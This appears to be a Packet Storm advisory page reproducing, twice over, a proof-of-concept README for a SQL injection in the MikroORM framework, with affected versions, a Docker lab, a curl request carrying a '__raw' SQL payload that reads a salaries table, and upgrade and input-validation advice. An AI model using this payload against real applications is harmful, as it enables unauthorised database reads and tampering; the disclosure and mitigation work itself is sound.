Description
MikroORM versions 7.0.5 and below suffer from a remote SQL injection vulnerability...
Basic Information
ID
PACKETSTORM:220501
Published
May 6, 2026 at 00:00
Affected Product
Affected Versions
# CVE-2026-43220 MikroORM SQL Injection
★ CVE-2026-43220 MikroORM SQL Injection PoC ★
https://github.com/user-attachments/assets/33724cfc-6151-47ff-9415-2f50c5124cd1
<br>
# Overview
> **CVE-2026-43220** is a **SQL Injection** vulnerability in **MikroORM**, a widely used TypeScript/Node.js ORM framework.
> When a user-supplied value containing a `__raw` property is passed to a **Custom Type column** without validation, MikroORM's `isRaw()` check identifies it as a trusted internal Raw SQL expression and inserts the attacker-controlled `sql` value directly into the generated query without type conversion or sanitization, causing **unintended execution of arbitrary SQL**.
<br>
# Affected Versions
| Category | Version |
|---|---|
| **Vulnerable** | MikroORM **version ≤ 6.4.3** & **7.0.0 ≤ version ≤ 7.0.5** |
| **Patched** | MikroORM **6.4.4** & **7.0.6** |
<br>
# Impact
- Exfiltration of sensitive data from the database without authorization
- Corruption or unintended modification of existing database records
<br>
# Environment
```bash
docker build -t cve-2026-43220-mikroorm-vuln .
docker run --rm -it -p 3000:3000 --name mikroorm-vuln cve-2026-43220-mikroorm-vuln
```
<br>
# PoC
After starting the vulnerable environment, follow the steps below to reproduce the attack.
## Step 1. Send a request with a malicious payload containing `__raw`
Send a JSON body that includes a `__raw` property targeting a Custom Type column.
```bash
curl -X POST http://localhost:3000/write \
-H "Content-Type: application/json" \
-d '{
"author":"x",
"title":"x,
"content": {
"__raw": true,
"sql": "(SELECT group_concat(name || ': ' || salary, ' / ') FROM salaries)"
}
}'
```
## Step 2. Check the HTTP response
Verify that the API returns a successful response without any error,
indicating that MikroORM accepted the malicious payload as a valid value.
## Step 3. Confirm sensitive data is exfiltrated into post content
Verify that the `content` field of the created post contains the query result
from the `salaries` table (e.g., `Alice: 5000 / Bob: 7000 / ...`),
confirming that data from an unrelated table has been silently embedded
into the response without any error or access control violation.
<br>
# Mitigation
- Upgrade to **MikroORM 6.4.4** or later, which introduces origin verification in `isRaw()` to reject externally supplied `__raw` properties
- Apply **whitelist-based input validation** to reject unexpected properties such as `__raw` before passing values to ORM layer
<br>
# Analysis
- KR: https://www.skshieldus.com/security-insights/reports/eqst-orm-injection-explained
- EN:
★ CVE-2026-43220 MikroORM SQL Injection PoC ★
https://github.com/user-attachments/assets/33724cfc-6151-47ff-9415-2f50c5124cd1
<br>
# Overview
> **CVE-2026-43220** is a **SQL Injection** vulnerability in **MikroORM**, a widely used TypeScript/Node.js ORM framework.
> When a user-supplied value containing a `__raw` property is passed to a **Custom Type column** without validation, MikroORM's `isRaw()` check identifies it as a trusted internal Raw SQL expression and inserts the attacker-controlled `sql` value directly into the generated query without type conversion or sanitization, causing **unintended execution of arbitrary SQL**.
<br>
# Affected Versions
| Category | Version |
|---|---|
| **Vulnerable** | MikroORM **version ≤ 6.4.3** & **7.0.0 ≤ version ≤ 7.0.5** |
| **Patched** | MikroORM **6.4.4** & **7.0.6** |
<br>
# Impact
- Exfiltration of sensitive data from the database without authorization
- Corruption or unintended modification of existing database records
<br>
# Environment
```bash
docker build -t cve-2026-43220-mikroorm-vuln .
docker run --rm -it -p 3000:3000 --name mikroorm-vuln cve-2026-43220-mikroorm-vuln
```
<br>
# PoC
After starting the vulnerable environment, follow the steps below to reproduce the attack.
## Step 1. Send a request with a malicious payload containing `__raw`
Send a JSON body that includes a `__raw` property targeting a Custom Type column.
```bash
curl -X POST http://localhost:3000/write \
-H "Content-Type: application/json" \
-d '{
"author":"x",
"title":"x,
"content": {
"__raw": true,
"sql": "(SELECT group_concat(name || ': ' || salary, ' / ') FROM salaries)"
}
}'
```
## Step 2. Check the HTTP response
Verify that the API returns a successful response without any error,
indicating that MikroORM accepted the malicious payload as a valid value.
## Step 3. Confirm sensitive data is exfiltrated into post content
Verify that the `content` field of the created post contains the query result
from the `salaries` table (e.g., `Alice: 5000 / Bob: 7000 / ...`),
confirming that data from an unrelated table has been silently embedded
into the response without any error or access control violation.
<br>
# Mitigation
- Upgrade to **MikroORM 6.4.4** or later, which introduces origin verification in `isRaw()` to reject externally supplied `__raw` properties
- Apply **whitelist-based input validation** to reject unexpected properties such as `__raw` before passing values to ORM layer
<br>
# Analysis
- KR: https://www.skshieldus.com/security-insights/reports/eqst-orm-injection-explained
- EN: